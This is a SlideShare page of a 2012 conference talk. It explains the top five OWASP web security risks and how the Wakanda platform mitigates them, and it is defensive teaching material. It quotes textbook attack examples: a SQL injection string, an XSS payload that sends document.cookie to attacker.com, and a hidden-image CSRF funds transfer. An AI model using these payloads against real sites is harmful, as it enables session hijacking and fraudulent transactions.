SlideShare a Scribd company logo

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

Alexandre Morgaut
Alexandre Morgaut
Technology
1 of 33
Download to read offline
Wakanda and the Top 5 Security Risks by Alexandre Morgaut
Presentation • Wakanda Community manager • W3C AC member • Web Architect • JS Expert, REST Lover, NoSQL Fanboy • W3C “jseverywhere“ community group @amorgaut
Agenda • The Open Web Application Security Project • Top 10 Application Security Risks • Zoom on Top 5 • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF)
OWASP • The Open Web Application Security Project • started in 2001 by Mark Curphey and Dennis Groves • includes corporations, educational organizations, and individuals • Cheat Sheets, Training, Books • AppSec Conferences • TOP 10 Security Risks https://www.owasp.org
Top 10 Risks • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF) • A6 - Security Misconfiguration • A7 - Insecure Cryptographic Storage • A8 - Failure to Restrict URL Access • A9 - Insufficient Transport Layer Protection • A10 - Unvalidated Redirects and Forwards
Injection • Attacks • SQL Injections, JS injections • deferred Injections
SQL Injection query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; http://example.com/app/accountView?id=' or '1'='1
Injection • Attacks • SQL Injections, JS injections • deferred Injections • Preventions • Input check, query parameters • Eval is Evil • new Function() == deferred eval() • no dynamically created JS query expression
Wakanda Security • NoSQL • Query parameters • User Access Right at the Database level • CRUD + execution Access Rights • Restricting queries • onRestrictingQuery handler
Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI
XSS Attack
XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; http://example.com/?CC='><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI • Prevention • validate any input • escape output
Wakanda Security • Static HTML files • Data inclusion based on datasources • output escaped by default • Beware • WYSIWYG widget + on Row Draw • deferred effect
Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking
Broken Authentication & Session Management http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking • Prevention • check session owner • session in HTTP only cookie • reasonable timeout
Wakanda Security • Session IDs managed automatically • HTTP only restriction • No session ID in URL or Form • Check of user session owner • Check of user-agent session owner
Insecure Direct Object Reference • Attacks • changed accessed resource URL
Insecure Direct Object Reference
Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( );
Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( ); http://example.com/app/accountInfo?acct=notmyacct
Insecure Direct Object Reference • Attacks • changed accessed resource URL • Prevention • Indirect resource reference • Check all resource access rights
Wakanda Security • Access always checked by the REST API • User Authenticated at database level • Restricting Queries • Extended DataClass • Current User or Current Group check
Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) Transfert API
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL <img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“ width="0" height="0">
Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent • Prevention • validate any input • use URL manipulations APIs • escape output • use Tokens in forms
TOP 10 Risks https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Recommended

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 

Recommended

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Cyber ppt
Cyber pptCyber ppt
Cyber pptkarthik menon
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASPIsuru Samaraweera
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Stormpath
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Duo Security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
 

More Related Content

What's hot

OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Stormpath
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
 

What's hot (20)

OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login form
 

Similar to Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Duo Security
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Web security
Web securityWeb security
Web securitySync.NET
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy AntonDevSecCon
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentationMahdi Dolati
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcKaty Anton
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions Ivo Andreev
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Lostar
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 

Similar to Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe (20)

Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Web security
Web securityWeb security
Web security
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy Anton
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentation
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwc
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 

More from Alexandre Morgaut

Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Alexandre Morgaut
 
Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Alexandre Morgaut
 
angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42Alexandre Morgaut
 
Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Alexandre Morgaut
 
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Alexandre Morgaut
 
HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014Alexandre Morgaut
 
JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)Alexandre Morgaut
 
Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Alexandre Morgaut
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013Alexandre Morgaut
 
From Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaFrom Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaAlexandre Morgaut
 
NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyAlexandre Morgaut
 
Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Alexandre Morgaut
 
End to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeEnd to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeAlexandre Morgaut
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012Alexandre Morgaut
 
NoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryNoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryAlexandre Morgaut
 
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Alexandre Morgaut
 
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Alexandre Morgaut
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
 
Etat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveEtat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveAlexandre Morgaut
 

More from Alexandre Morgaut (20)

Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
 
Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017
 
angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42
 
Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012
 
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
 
HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014
 
JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)
 
Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013
 
From Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaFrom Web App Model Design to Production with Wakanda
From Web App Model Design to Production with Wakanda
 
NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love story
 
Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29
 
End to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeEnd to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) Europe
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012
 
End-to-end W3C APIs
End-to-end W3C APIsEnd-to-end W3C APIs
End-to-end W3C APIs
 
NoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryNoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love Story
 
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
 
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012
 
Etat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveEtat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS Geneve
 

Recently uploaded

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
